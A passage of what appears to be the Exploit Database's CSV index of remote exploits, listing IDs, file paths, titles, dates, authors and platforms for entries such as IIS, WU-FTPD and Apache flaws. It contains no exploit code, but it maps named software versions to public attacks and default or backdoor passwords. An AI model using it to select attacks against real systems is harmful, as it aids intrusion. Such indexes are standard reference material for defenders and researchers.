Upload",2000-12-01,Key,windows,remote, -20460,exploits/windows/remote/20460.txt,"Microsoft Windows NT 4.0 - Phonebook Server Buffer Overflow",2000-12-04,"Alberto Solino",windows,remote, -20461,exploits/windows/remote/20461.txt,"Cat Soft Serv-U FTP Server 2.4/2.5 - FTP Directory Traversal",2000-12-05,Zoa_Chien,windows,remote, -20462,exploits/unix/remote/20462.txt,"Hylafax 4.0 pl2 Faxsurvey - Remote Command Execution",1998-08-04,Tom,unix,remote, -20463,exploits/cgi/remote/20463.txt,"WEBgais 1.0 - Remote Command Execution",1997-07-10,"Razvan Dragomirescu",cgi,remote, -20465,exploits/cgi/remote/20465.sh,"Squid Web Proxy 2.2 - 'cachemgr.cgi' Unauthorized Connection",1999-07-23,fsaa,cgi,remote, -20466,exploits/multiple/remote/20466.txt,"Apache 1.3 + PHP 3 - File Disclosure",2000-12-06,"china nsl",multiple,remote, -20467,exploits/multiple/remote/20467.txt,"Inktomi Search Software 3.0 - Source Disclosure",2000-12-05,"china nsl",multiple,remote, -20468,exploits/multiple/remote/20468.txt,"Inktomi Search Software 3.0 - Information Disclosure",2000-12-05,"china nsl",multiple,remote, -20469,exploits/unix/remote/20469.txt,"Endymion MailMan 3.0.x - Arbitrary Command Execution",2000-12-06,"Secure Reality Advisories",unix,remote, -20472,exploits/multiple/remote/20472.txt,"IBM DB2 - Universal Database for Linux 6.1/Windows NT 6.1 Known Default Password",2000-12-05,benjurry,multiple,remote, -20481,exploits/windows/remote/20481.txt,"Microsoft IIS 2.0/3.0 - Appended Dot Script Source Disclosure",1997-02-20,"Mark Joseph Edwards",windows,remote, -20482,exploits/novell/remote/20482.txt,"Novell Netware Web Server 3.x - files.pl",1998-12-01,anonymous,novell,remote, -20483,exploits/cgi/remote/20483.txt,"WEBgais 1.0 - websendmail Remote Command Execution",1997-07-04,"Razvan Dragomirescu",cgi,remote, -20486,exploits/unix/remote/20486.html,"Matt Wright FormMail 1.x - Cross-Site Request Forgery",1997-01-01,anonymous,unix,remote, -20488,exploits/windows/remote/20488.txt,"MetaProducts Offline Explorer 1.x - FileSystem Disclosure",2000-12-07,Dodger,windows,remote, -20489,exploits/windows/remote/20489.txt,"keware technologies homeseer 1.4 - Directory Traversal",2000-12-07,"SNS Research",windows,remote, -20490,exploits/unix/remote/20490.c,"BitchX IRC Client 1.0 c17 - DNS Buffer Overflow",2000-12-04,nimrood,unix,remote, -20491,exploits/multiple/remote/20491.txt,"KTH Kerberos 4 - Arbitrary Proxy Usage",2000-12-08,"Jouko Pynnonen",multiple,remote, -20492,exploits/unix/remote/20492.txt,"ssldump 0.9 b1 - Format String",2000-12-11,c0ncept,unix,remote, -20495,exploits/unix/remote/20495.c,"Oops Proxy Server 1.4.22 - Remote Buffer Overflow (1)",2000-12-11,CyRaX,unix,remote, -20496,exploits/linux/remote/20496.c,"Oops Proxy Server 1.4.22 - Remote Buffer Overflow (2)",2000-12-07,diman,linux,remote, -20497,exploits/cgi/remote/20497.html,"Leif M. Wright everythingform.cgi 2.0 - Arbitrary Command Execution",2000-12-11,rpc,cgi,remote, -20501,exploits/windows/remote/20501.rb,"Cyclope Employee Surveillance Solution 6.0 - SQL Injection (Metasploit)",2012-08-15,Metasploit,windows,remote,7879 -20502,exploits/java/remote/20502.rb,"Novell ZENworks Asset Management - Remote Execution (Metasploit)",2012-08-15,Metasploit,java,remote,8080 -20503,exploits/cgi/remote/20503.html,"Leif M. Wright simplestmail.cgi 1.0 - Remote Command Execution",2000-12-11,rpc,cgi,remote, -20504,exploits/cgi/remote/20504.html,"Leif M. Wright - 'ad.cgi' 1.0 Unchecked Input",2000-12-11,rpc,cgi,remote, -20506,exploits/cgi/remote/20506.html,"Leif M. Wright simplestguest.cgi 2.0 - Remote Command Execution",2000-12-14,suid,cgi,remote, -20507,exploits/multiple/remote/20507.txt,"alex heiphetz Group eZshopper 2.0/3.0 - Directory Traversal",2000-12-13,Nsfocus,multiple,remote, -20510,exploits/windows/remote/20510.txt,"AOL Instant Messenger 3.5.1856/4.0/4.1.2010/4.2.1193 - 'aim://' Remote Buffer Overflow",2000-12-12,"Joe Testa",windows,remote, -20511,exploits/windows/remote/20511.txt,"AOL Instant Messenger 4.0/4.1.2010/4.2.1193 - BuddyIcon Buffer Overflow",2000-12-12,@stake,windows,remote, -20512,exploits/unix/remote/20512.txt,"BSD ftpd 0.3.2 - Single Byte Buffer Overflow",2000-12-18,Scrippie,unix,remote, -20513,exploits/multiple/remote/20513.txt,"iCat Electronic Commerce Suite 3.0 - File Disclosure",1997-11-08,"Mikael Johansson",multiple,remote, -20516,exploits/multiple/remote/20516.txt,"BEA Systems WebLogic Server 4.0 x/4.5 x/5.1 x - Double Dot Buffer Overflow",2000-12-19,peter.grundl,multiple,remote, -20519,exploits/multiple/remote/20519.c,"Check Point Software Firewall-1 4.1 SP2 - Fast Mode TCP Fragment",2000-12-14,"Thomas Lopatic",multiple,remote, -20522,exploits/cgi/remote/20522.txt,"Technote 2000/2001 - 'board' File Disclosure",2000-12-23,bt,cgi,remote, -20523,exploits/cgi/remote/20523.pl,"Technote 2000/2001 - 'Filename' Command Execution / File Disclosure",2000-12-27,Ksecurity,cgi,remote, -20524,exploits/cgi/remote/20524.txt,"Brian Stanback bsguest.cgi 1.0 - Remote Command Execution",2000-12-20,rivendell_team,cgi,remote, -20525,exploits/cgi/remote/20525.txt,"Brian Stanback bslist.cgi 1.0 - Remote Command Execution",2000-12-20,rivendell_team,cgi,remote, -20527,exploits/cgi/remote/20527.txt,"Informix Webdriver 1.0 - Remote Administration Access",2000-12-30,isno,cgi,remote, -20528,exploits/windows/remote/20528.html,"Microsoft Windows Media Player 7.0 - JavaScript URL",2001-01-01,"Georgi Guninski",windows,remote, -20529,exploits/multiple/remote/20529.pl,"Lotus Domino Server 5.0.x - Directory Traversal (1)",2001-01-15,"Michael Smith",multiple,remote, -20530,exploits/multiple/remote/20530.sh,"Lotus Domino Server 5.0.x - Directory Traversal (2)",2001-01-05,"Georgi Guninski",multiple,remote, -20533,exploits/cgi/remote/20533.txt,"eXtropia bbs_forum.cgi 1.0 - Arbitrary Command Execution",2001-01-07,scott,cgi,remote, -20537,exploits/multiple/remote/20537.txt,"Borland/Inprise Interbase 4.0/5.0/6.0 - Backdoor Password",2001-01-10,"Frank Schlottmann-Goedde",multiple,remote, -20547,exploits/windows/remote/20547.txt,"Microsoft Internet Explorer - Time Element Memory Corruption (MS11-050)",2012-08-16,Ciph3r,windows,remote, -20551,exploits/linux/remote/20551.pl,"E-Mail Security Virtual Appliance (ESVA) - Remote Execution",2012-08-16,iJoo,linux,remote, -20553,exploits/windows/remote/20553.html,"Microsoft Windows Media Player 7.0 - '.wmz' Arbitrary Java Applet",2001-01-15,"Georgi Guninski",windows,remote, -20557,exploits/windows/remote/20557.pl,"Omnicron OmniHTTPd 2.0.7 - File Corruption / Command Execution",2001-08-01,"Joe Testa",windows,remote, -20559,exploits/windows/remote/20559.c,"tinyproxy tinyproxy 1.3.2/1.3.3 - Remote Heap Overflow",2001-01-17,CyRaX,windows,remote, -20563,exploits/unix/remote/20563.txt,"WU-FTPD 2.4.2/2.5 .0/2.6.0/2.6.1/2.6.2 - FTP Conversion",1999-12-20,suid,unix,remote, -20565,exploits/hardware/remote/20565.c,"HP JetDirect rev. G.08.x/rev. H.08.x/x.08.x/J3111A - LCD Display Modification",1997-12-08,sili,hardware,remote, -20567,exploits/cgi/remote/20567.txt,"PHP PHP/fi 2.0 - Directory Traversal",1997-04-16,Shamanski,cgi,remote, -20568,exploits/sco/remote/20568.txt,"Skunkware 2.0 - view-source Directory Traversal",1997-04-16,myst,sco,remote, -20569,exploits/linux/remote/20569.c,"mICQ 0.4.6 - Remote Buffer Overflow",2001-01-17,"tHE rECIdjVO",linux,remote, -20570,exploits/cgi/remote/20570.txt,"Sambar Server 4.1 Beta - Admin Access",1998-06-10,"Michiel de Weerd",cgi,remote, -20571,exploits/windows/remote/20571.txt,"Microsoft Outlook 2000 0/98 0/Express 5.5 - Concealed Attachment",2001-01-17,http-equiv,windows,remote, -20612,exploits/windows/remote/20612.txt,"informs picserver 1.0 - Directory Traversal",2001-02-05,joetesta,windows,remote, -20582,exploits/windows/remote/20582.c,"Icecast 1.3.7/1.3.8 - 'print_client()' Format String",2001-01-21,CyRaX,windows,remote, -20583,exploits/cgi/remote/20583.pl,"textcounter.pl 1.2 - Arbitrary Command Execution",1998-06-24,"Doru Petrescu",cgi,remote, -20584,exploits/windows/remote/20584.txt,"fastream ftp++ 2.0 - Directory Traversal",2001-01-22,"SNS Research",windows,remote, -20590,exploits/windows/remote/20590.txt,"Microsoft IIS 3.0/4.0 - Upgrade BDIR.HTR",1998-12-25,"rain forest puppy",windows,remote, -20591,exploits/multiple/remote/20591.txt,"Netscape Enterprise Server 3.0/4.0 - 'Index' Disclosure",2001-01-24,"Security Research Team",multiple,remote, -20592,exploits/jsp/remote/20592.txt,"Oracle 8.1.7 - JSP/JSPSQL Remote File Reading",2000-01-22,"Georgi Guninski",jsp,remote, -20593,exploits/freebsd/remote/20593.txt,"FreeBSD 3.x/4.x - 'ipfw' Filtering Evasion",2001-01-23,"Aragon Gouveia",freebsd,remote, -20594,exploits/unix/remote/20594.txt,"WU-FTPD 2.4.2/2.5/2.6 - Debug Mode Client Hostname Format String",2001-01-23,"Wu-ftpd team",unix,remote, -20595,exploits/multiple/remote/20595.txt,"NCSA 1.3/1.4.x/1.5 / Apache HTTPd 0.8.11/0.8.14 - ScriptAlias Source Retrieval",1999-09-25,anonymous,multiple,remote, -20597,exploits/linux/remote/20597.txt,"Majordomo 1.89/1.90 - lists Command Execution",1994-06-06,"Razvan Dragomirescu",linux,remote, -20599,exploits/unix/remote/20599.sh,"Sendmail 8.6.9 IDENT - Remote Command Execution",1994-02-24,CIAC,unix,remote, -20600,exploits/windows/remote/20600.c,"SmartMax MailMax 1.0 - SMTP Buffer Overflow",1999-02-13,_mcp_,windows,remote, -20601,exploits/multiple/remote/20601.txt,"iweb hyperseek 2000 - Directory Traversal",2001-01-28,"MC GaN",multiple,remote, -20602,exploits/solaris/remote/20602.c,"Solaris x86 2.4/2.5 - nlps_server Buffer Overflow",1998-04-01,"Last Stage of Delirium",solaris,remote, -20605,exploits/windows/remote/20605.cpp,"Apple QuickTime plugin - Windows 4.1.2 (Japanese) Remote Overflow",2012-08-18,UNYUN,windows,remote, -20606,exploits/cgi/remote/20606.pl,"qDecoder 4.x/5.x - Remote Buffer Overflow",2000-03-26,"Jin Ho You",cgi,remote, -20607,exploits/windows/remote/20607.txt,"GoAhead Web Server 2.0/2.1 - Directory Traversal",2001-02-02,"Sergey Nenashev",windows,remote, -20608,exploits/windows/remote/20608.txt,"Guido Frassetto SEDUM HTTP Server 2.0 - Directory Traversal",2001-02-04,"Joe Testa",windows,remote, -20609,exploits/cgi/remote/20609.txt,"Heat-On HSWeb Web Server 2.0 - Full Path Disclosure",2001-02-04,"Joe Testa",cgi,remote, -20611,exploits/cgi/remote/20611.txt,"anaconda Foundation 1.4 < 1.9 - Directory Traversal",2000-10-13,pestilence,cgi,remote, -20614,exploits/windows/remote/20614.txt,"aolserver 3.2 Win32 - Directory Traversal",2001-02-06,joetesta,windows,remote, -20615,exploits/unix/remote/20615.txt,"SSH 1.2.30 - Daemon Logging Failure",2001-02-05,"Jose Nazario",unix,remote, -20616,exploits/windows/remote/20616.txt,"soft lite serverworx 3.0 - Directory Traversal",2001-02-07,joetesta,windows,remote, -20617,exploits/unix/remote/20617.c,"SSH 1.2.x - CRC-32 Compensation Attack Detector",2001-02-08,"Michal Zalewski",unix,remote, -20618,exploits/multiple/remote/20618.txt,"IBM Net.Commerce 2.0/3.x/4.x - orderdspc.d2w order_rn Option SQL Injection",2001-02-05,"Rudi Carell",multiple,remote, -20619,exploits/linux/remote/20619.c,"Linuxconf 1.1.6 r10 - Remote Buffer Overflow",1999-12-21,R00T-X,linux,remote, -20620,exploits/sco/remote/20620.c,"SCO UNIX 5 calserver - Remote Buffer Overflow",1998-12-29,"Leshka Zakharoff",sco,remote, -20622,exploits/linux/remote/20622.c,"Xmail 0.5/0.6 CTRLServer - Arbitrary Commands",2001-02-01,isno,linux,remote, -20623,exploits/cgi/remote/20623.txt,"carey internets services commerce.cgi 2.0.1 - Directory Traversal",2001-02-12,slipy,cgi,remote, -20624,exploits/windows/remote/20624.rb,"Adobe Flash Player 11.3 - Font Parsing Code Execution (Metasploit)",2012-08-20,Metasploit,windows,remote, -20625,exploits/multiple/remote/20625.txt,"SilverPlatter WebSPIRS 3.3.1 - File Disclosure",2001-02-12,cuctema,multiple,remote, -20628,exploits/windows/remote/20628.txt,"his software auktion 1.62 - Directory Traversal",2001-02-12,cuctema,windows,remote, -20629,exploits/cgi/remote/20629.txt,"Way-Board 2.0 - File Disclosure",2001-02-12,cuctema,cgi,remote, -20630,exploits/cgi/remote/20630.txt,"Martin Hamilton ROADS 2.3 - File Disclosure",2001-02-12,cuctema,cgi,remote, -20631,exploits/cgi/remote/20631.txt,"PALS Library System WebPALS 1.0 - pals-cgi Traversal Arbitrary File Read",2001-02-02,cuctema,cgi,remote, -20632,exploits/cgi/remote/20632.txt,"PALS Library System WebPALS 1.0 - pals-cgi Arbitrary Command Execution",2001-02-02,cuctema,cgi,remote, -20633,exploits/cgi/remote/20633.txt,"Brightstation Muscat 1.0 - Full Path Disclosure",2001-02-12,cuctema,cgi,remote, -20635,exploits/multiple/remote/20635.txt,"caucho Technology resin 1.2 - Directory Traversal",2001-02-16,joetesta,multiple,remote, -20636,exploits/linux/remote/20636.txt,"thinking arts es.one 1.0 - Directory Traversal",2001-02-16,slipy,linux,remote, -20637,exploits/windows/remote/20637.txt,"itafrica webactive 1.0 - Directory Traversal",2001-02-16,slipy,windows,remote, -20638,exploits/multiple/remote/20638.txt,"Bajie WebServer 0.78/0.90 - Remote Command Execution",2001-02-15,joetesta,multiple,remote, -20639,exploits/multiple/remote/20639.txt,"Bajie 0.78 - Arbitrary Shell Command Execution",2001-02-15,joetesta,multiple,remote, -20640,exploits/windows/remote/20640.txt,"Working Resources BadBlue 1.2.7 - Full Path Disclosure",2001-02-20,"SNS Research",windows,remote, -20642,exploits/cgi/remote/20642.pl,"Adcycle 0.77/0.78 - AdLibrary.pm Session Access",2001-02-19,"Neil K",cgi,remote, -20646,exploits/unix/remote/20646.c,"LICQ 0.85/1.0.1/1.0.2 - Remote Buffer Overflow",2000-12-26,"Stan Bubrouski",unix,remote, -20647,exploits/windows/remote/20647.c,"Atrium Software Mercur Mail Server 3.3 - EXPN Buffer Overflow",2001-02-23,"Martin Rakhmanoff",windows,remote, -20648,exploits/solaris/remote/20648.c,"Solaris 2.6/7.0/8 - snmpXdmid Buffer Overflow",2001-03-15,"Last Stage of Delirium",solaris,remote, -20649,exploits/solaris/remote/20649.pm,"Solaris 2.6/7.0/8 - snmpXdmid Buffer Overflow (Metasploit)",2001-03-15,vlad902,solaris,remote, -20652,exploits/hardware/remote/20652.txt,"Cisco IOS 11.x/12.0 - ILMI SNMP Community String",2001-02-27,pask,hardware,remote, -20653,exploits/windows/remote/20653.txt,"SunFTP 1.0 Build 9 - Unauthorized File Access",2001-03-02,se00020,windows,remote, -20657,exploits/windows/remote/20657.txt,"Robin Twombly A1 HTTP Server 1.0 - Directory Traversal",2001-02-27,slipy,windows,remote, -20660,exploits/unix/remote/20660.txt,"KICQ 1.0 - Arbitrary Command Execution",2001-02-14,"Marc Roessler",unix,remote, -20661,exploits/windows/remote/20661.txt,"jarle aase war ftpd 1.67 b04 - Directory Traversal",2001-03-06,se00020,windows,remote, -20663,exploits/windows/remote/20663.txt,"WhitSoft SlimServe ftpd 1.0/2.0 - Directory Traversal",2001-02-28,joetesta,windows,remote, -20680,exploits/windows/remote/20680.html,"Microsoft Internet Explorer 5.0.1/5.5/6.0 - Telnet Client File Overwrite",2001-03-09,"Oliver Friedrichs",windows,remote, -20683,exploits/cgi/remote/20683.txt,"IkonBoard 2.1.7b - Remote File Disclosure",2001-03-11,"Martin J. Muench",cgi,remote, -20685,exploits/multiple/remote/20685.txt,"IBM Net.Commerce 3.1/3.2 Websphere - Weak Password",2001-03-07,"Rudi Carell",multiple,remote, -20686,exploits/cgi/remote/20686.txt,"Free Online Dictionary of Computing 1.0 - Remote File Viewing",2001-03-09,Cgisecurity,cgi,remote, -20687,exploits/windows/remote/20687.txt,"OReilly Software WebSite Professional 2.5.4 - Path Disclosure",2001-03-16,"Roberto Moreno",windows,remote, -20688,exploits/windows/remote/20688.txt,"Qualcomm Eudora 5.0.2 - 'Use Microsoft Viewer' Code Execution",2001-03-18,http-equiv,windows,remote, -20689,exploits/cgi/remote/20689.pl,"SWSoft ASPSeek 1.0 - 's.cgi' Remote Buffer Overflow",2001-03-19,teleh0r,cgi,remote, -20690,exploits/linux/remote/20690.sh,"WU-FTPD 2.4/2.5/2.6 / Trolltech ftpd 1.2 / ProFTPd 1.2 / BeroFTPD 1.3.4 FTP - glob Expansion",2001-03-15,"Frank DENIS",linux,remote, -20692,exploits/multiple/remote/20692.pl,"Apache 1.3 - Artificially Long Slash Path Directory Listing (1)",2001-06-13,rfp,multiple,remote, -20693,exploits/multiple/remote/20693.c,"Apache 1.3 - Artificially Long Slash Path Directory Listing (2)",2002-02-21,st0ic,multiple,remote, -20694,exploits/multiple/remote/20694.pl,"Apache 1.3 - Artificially Long Slash Path Directory Listing (3)",2001-06-13,farm9,multiple,remote, -20695,exploits/multiple/remote/20695.pl,"Apache 1.3 - Artificially Long Slash Path Directory Listing (4)",2001-06-13,farm9,multiple,remote, -20702,exploits/windows/remote/20702.rb,"Sysax Multi Server 5.64 - Create Folder Buffer Overflow (Metasploit)",2012-08-21,"Matt Andreko",windows,remote, -20714,exploits/cgi/remote/20714.txt,"anaconda clipper 3.3 - Directory Traversal",2001-03-27,"UkR hacking team",cgi,remote, -20716,exploits/windows/remote/20716.txt,"Apache Tomcat 3.0 - Directory Traversal",2001-03-28,lovehacker,windows,remote, -20717,exploits/windows/remote/20717.txt,"elron im Anti-Virus 3.0.3 - Directory Traversal",2001-03-23,"Erik Tayler",windows,remote, -20719,exploits/multiple/remote/20719.txt,"Tomcat 3.2.1/4.0 / Weblogic Server 5.1 - URL JSP Request Source Code Disclosure",2001-03-28,"Sverre H. Huseby",multiple,remote, -20722,exploits/multiple/remote/20722.txt,"Caucho Technology Resin 1.2/1.3 - JavaBean Disclosure",2001-04-03,lovehacker,multiple,remote, -20723,exploits/windows/remote/20723.pl,"Gene6 BPFTP FTP Server 2.0 - User Credentials Disclosure",2001-04-03,"Rob Beck",windows,remote, -20725,exploits/cgi/remote/20725.txt,"Microburst uStorekeeper 1.x - Arbitrary Commands",2001-04-02,"UkR hacking team",cgi,remote, -20726,exploits/windows/remote/20726.pl,"Gene6 BPFTP Server 2.0 - File Existence Disclosure",2001-04-03,"Rob Beck",windows,remote, -20727,exploits/linux/remote/20727.c,"NTPd - Remote Buffer Overflow",2001-04-04,"babcia padlina ltd",linux,remote, -20730,exploits/unix/remote/20730.txt,"IPFilter 3.x - Fragment Rule Bypass",2001-04-09,"Thomas Lopatic",unix,remote, -20731,exploits/bsd/remote/20731.c,"FreeBSD 2.2-4.2 / NetBSD 1.2-4.5 / OpenBSD 2.x - FTPd 'glob()' Remote Buffer Overflow",2001-04-14,"fish stiqz",bsd,remote, -20732,exploits/freebsd/remote/20732.pl,"FreeBSD 4.2-stable - FTPd 'glob()' Remote Buffer Overflow",2001-04-16,"Elias Levy",freebsd,remote, -20733,exploits/openbsd/remote/20733.c,"OpenBSD 2.x < 2.8 FTPd - 'glob()' Remote Buffer Overflow",2001-04-16,"Elias Levy",openbsd,remote, -20738,exploits/multiple/remote/20738.txt,"PGP 5.x/6.x/7.0 - ASCII Armor Parser Arbitrary File Creation",2001-04-09,"Chris Anley",multiple,remote, -20744,exploits/cgi/remote/20744.pl,"nph-maillist 3.0/3.5 - Arbitrary Code Execution",2001-04-10,Kanedaaa,cgi,remote, -20745,exploits/solaris/remote/20745.txt,"Solaris 2.6/7.0 - IN.FTPD CWD 'Username' Enumeration",2001-04-11,"Johnny Cyberpunk",solaris,remote, -20748,exploits/linux/remote/20748.pl,"cfingerd 1.4 - Format String (1)",2001-04-11,Lez,linux,remote, -20749,exploits/linux/remote/20749.c,"cfingerd 1.4 - Format String (2)",2001-04-16,VeNoMouS,linux,remote, -20752,exploits/cgi/remote/20752.txt,"NCM Content Management System - content.pl Input Validation",2001-04-13,"RA-Soft Security",cgi,remote, -20944,exploits/windows/remote/20944.rb,"SAP NetWeaver HostControl - Command Injection (Metasploit)",2012-08-31,Metasploit,windows,remote, -20758,exploits/windows/remote/20758.c,"Vice City Multiplayer Server 0.3z R2 - Remote Code Execution",2012-08-23,Sasuke78200,windows,remote, -20764,exploits/solaris/remote/20764.txt,"Solaris 2.6 - FTP Core Dump Shadow Password Recovery",2001-04-17,warning3,solaris,remote, -20765,exploits/linux/remote/20765.pl,"Linux Kernel 2.4 - IPTables FTP Stateful Inspection Arbitrary Filter Rule Insertion",2001-04-16,"Cristiano Lincoln Mattos",linux,remote, -20774,exploits/windows/remote/20774.txt,"Microsoft Internet Explorer 5.5 - CLSID File Execution",2001-04-17,"Georgi Guninski",windows,remote, -20775,exploits/windows/remote/20775.txt,"Netscape SmartDownload 1.3 - Remote Buffer Overflow",2001-04-13,"Craig Davison",windows,remote, -20780,exploits/cgi/remote/20780.c,"CrossWind CyberScheduler 2.1 - websyncd Remote Buffer Overflow",2001-04-17,"Enrique A.",cgi,remote, -20782,exploits/windows/remote/20782.eml,"Microsoft Internet Explorer 5.0/5.5 / OE 5.5 - XML Stylesheets Active Scripting",2001-04-20,"Georgi Guninski",windows,remote, -20791,exploits/unix/remote/20791.php,"Netscape Navigator 4.0.8 - 'about:' Domain Information Disclosure",2001-04-09,"Florian Wesch",unix,remote, -20793,exploits/windows/remote/20793.txt,"RobTex Viking Server 1.0.7 - Relative Path Webroot Escaping",2001-04-23,joetesta,windows,remote, -20794,exploits/windows/remote/20794.c,"WFTPD 3.0 - 'RETR' / 'CWD' Remote Buffer Overflow",2001-04-22,"Len Budney",windows,remote, -20796,exploits/linux/remote/20796.rb,"Zabbix Server - Arbitrary Command Execution (Metasploit)",2012-08-27,Metasploit,linux,remote, -20797,exploits/multiple/remote/20797.txt,"Perl Web Server 0.x - Directory Traversal",2001-04-24,neme-dhc,multiple,remote, -20799,exploits/cgi/remote/20799.c,"PowerScripts PlusMail WebConsole 1.0 - Weak Authentication (1)",2000-01-11,"Synnergy Networks",cgi,remote, -20800,exploits/cgi/remote/20800.c,"PowerScripts PlusMail WebConsole 1.0 - Weak Authentication (2)",2000-01-11,missnglnk,cgi,remote, -20801,exploits/cgi/remote/20801.c,"PowerScripts PlusMail WebConsole 1.0 - Weak Authentication (3)",2000-01-20,ytcracker,cgi,remote, -20803,exploits/windows/remote/20803.txt,"RaidenFTPd 2.1 - Directory Traversal",2001-04-25,joetesta,windows,remote, -20805,exploits/irix/remote/20805.c,"SGI IRIX 3/4/5/6 / OpenLinux 1.0/1.1 - routed traceon",1998-10-21,Rootshell,irix,remote, -20806,exploits/hardware/remote/20806.txt,"Tektronix Phaser 740/750/850/930 - Network Printer Administration Interface",2001-04-25,Ltlw0lf,hardware,remote, -20807,exploits/multiple/remote/20807.txt,"datawizard webxq 2.1.204 - Directory Traversal",2001-04-27,joetesta,multiple,remote, -20808,exploits/cgi/remote/20808.txt,"PerlCal 2.x - Directory Traversal",2001-04-27,ThePike,cgi,remote, -20809,exploits/cgi/remote/20809.html,"Excite for Web Servers 1.1 - Administrative Password",1998-11-30,"Michael Gerdts",cgi,remote, -20815,exploits/windows/remote/20815.pl,"Microsoft IIS 5.0 - '.printer' ISAPI Extension Buffer Overflow (1)",2001-05-01,storm,windows,remote, -20816,exploits/windows/remote/20816.c,"Microsoft IIS 5.0 - '.printer' ISAPI Extension Buffer Overflow (2)",2001-05-01,"dark spyrit",windows,remote, -20817,exploits/windows/remote/20817.c,"Microsoft IIS 5.0 - '.printer' ISAPI Extension Buffer Overflow (3)",2005-02-02,styx,windows,remote, -20818,exploits/windows/remote/20818.txt,"Microsoft IIS 5.0 - '.printer' ISAPI Extension Buffer Overflow (4)",2001-05-01,"Cyrus The Great",windows,remote, -20819,exploits/windows/remote/20819.txt,"BRS Webweaver 0.x - FTP Root Full Path Disclosure",2001-04-28,joetesta,windows,remote, -20820,exploits/windows/remote/20820.c,"NullSoft Winamp 2.x - AIP Buffer Overflow",2001-04-29,byterage,windows,remote, -20825,exploits/windows/remote/20825.txt,"Michael Lamont Savant HTTP Server 2.1 - Directory Traversal",2001-02-17,"Tom Tom",windows,remote, -20826,exploits/windows/remote/20826.txt,"Jason Rahaim MP3Mystic 1.0.x - Server Directory Traversal",2001-05-07,neme-dhc,windows,remote, -20829,exploits/windows/remote/20829.txt,"T. Hauck Jana Server 1.45/1.46 - Hex Encoded Directory Traversal",2001-05-07,neme-dhc,windows,remote, -20831,exploits/cgi/remote/20831.txt,"Drummond Miles A1Stats 1.0 - 'a1disp2.cgi' Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote, -20832,exploits/cgi/remote/20832.txt,"Drummond Miles A1Stats 1.0 - 'a1disp3.cgi' Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote, -20833,exploits/cgi/remote/20833.txt,"Drummond Miles A1Stats 1.0 - 'a1disp4.cgi' Traversal Arbitrary File Read",2001-05-07,neme-dhc,cgi,remote, -20835,exploits/windows/remote/20835.c,"Microsoft IIS 3.0/4.0/5.0 - PWS Escaped Characters Decoding Command Execution (1)",2001-05-15,"Filip Maertens",windows,remote, -20836,exploits/windows/remote/20836.c,"Microsoft IIS 3.0/4.0/5.0 - PWS Escaped Characters Decoding Command Execution (2)",2001-05-16,HuXfLuX,windows,remote, -20837,exploits/windows/remote/20837.pl,"Microsoft IIS 3.0/4.0/5.0 - PWS Escaped Characters Decoding Command Execution (3)",2001-05-15,"Cyrus The Gerat",windows,remote, -20838,exploits/windows/remote/20838.c,"Microsoft IIS 3.0/4.0/5.0 - PWS Escaped Characters Decoding Command Execution (4)",2001-05-15,MovAX,windows,remote, -20839,exploits/windows/remote/20839.sh,"Microsoft IIS 3.0/4.0/5.0 - PWS Escaped Characters Decoding Command Execution (5)",2001-05-15,"Leif Jakob",windows,remote, -20840,exploits/windows/remote/20840.txt,"Microsoft IIS 3.0/4.0/5.0 - PWS Escaped Characters Decoding Command Execution (6)",2001-05-15,A.Ramos,windows,remote, -20841,exploits/windows/remote/20841.txt,"Microsoft IIS 3.0/4.0/5.0 - PWS Escaped Characters Decoding Command Execution (7)",2001-05-15,"Gary O'Leary-Steele",windows,remote, -20842,exploits/windows/remote/20842.txt,"Microsoft IIS 3.0/4.0/5.0 - PWS Escaped Characters Decoding Command Execution (8)",2001-05-15,Roelof,windows,remote, -20849,exploits/cgi/remote/20849.pl,"DCForum 6.0 - Remote Admin Privilege Arbitrary Commands",2001-05-08,"Franklin DeMatto",cgi,remote, -20850,exploits/windows/remote/20850.txt,"Pacific Software Carello 1.2.1 Shopping Cart - Command Execution",2001-05-14,"Peter Gründl",windows,remote, -20865,exploits/java/remote/20865.rb,"Java 7 Applet - Remote Code Execution (Metasploit)",2012-08-27,Metasploit,java,remote, -20869,exploits/multiple/remote/20869.html,"eSafe Gateway 2.1 - Script-filtering Bypass",2001-05-20,"eDvice Security Services",multiple,remote, -20876,exploits/windows/remote/20876.pl,"Simple Web Server 2.2-rc2 - ASLR Bypass",2012-08-28,pole,windows,remote, -20878,exploits/cgi/remote/20878.txt,"mimanet source viewer 2.0 - Directory Traversal",2001-05-23,joetesta,cgi,remote, -20879,exploits/unix/remote/20879.txt,"OpenServer 5.0.5/5.0.6 / HP-UX 10/11 / Solaris 2.6/7.0/8 - rpc.yppasswdd Buffer Overrun",2001-05-10,metaray,unix,remote, -20881,exploits/multiple/remote/20881.txt,"Beck IPC GmbH IPC@CHIP - TelnetD Login Account Brute Force",2001-05-24,"Courtesy Sentry Research Labs",multiple,remote, -20882,exploits/multiple/remote/20882.txt,"faust Informatics FreeStyle chat 4.1 sr2 - Directory Traversal",2001-05-25,nemesystm,multiple,remote, -20884,exploits/windows/remote/20884.txt,"ACLogic CesarFTP 0.98b - Directory Traversal",2001-05-27,byterage,windows,remote, -20886,exploits/windows/remote/20886.txt,"Omnicron OmniHTTPd 2.0.4-8 - File Source Disclosure",2001-05-26,astral,windows,remote, -20887,exploits/cgi/remote/20887.txt,"Cosmicperl Directory Pro 2.0 - Arbitrary File Disclosure",2001-05-28,Marshal,cgi,remote, -20888,exploits/windows/remote/20888.txt,"Qualcomm Eudora 5.1 - Hidden Attachment Execution",2001-05-29,http-equiv,windows,remote, -20889,exploits/multiple/remote/20889.txt,"GNU Privacy Guard 1.0.x - Format String",2001-05-29,"fish stiqz",multiple,remote, -20890,exploits/multiple/remote/20890.txt,"Aladdin Knowledge Systems eSafe Gateway 3.0 - HTML tag Script-filtering Bypass",2001-05-29,"eDvice Security Services",multiple,remote, -20891,exploits/multiple/remote/20891.txt,"Aladdin Knowledge Systems eSafe Gateway 3.0 - Unicode Script-filtering Bypass",2001-05-29,"eDvice Security Services",multiple,remote, -20892,exploits/hardware/remote/20892.txt,"Olicom XLT-F XL 80 IM V5.5BL2 - Undocumented Community String",2001-03-25,"Jacek Lipkowski",hardware,remote, -20893,exploits/windows/remote/20893.txt,"Trend Micro Interscan VirusWall for Windows NT 3.4/3.5/3.51 - Remote Reconfiguration",2001-05-24,snsadv,windows,remote, -20894,exploits/multiple/remote/20894.txt,"Acme.Serve 1.7 - Arbitrary File Access",2001-05-31,"Adnan Rahman",multiple,remote, 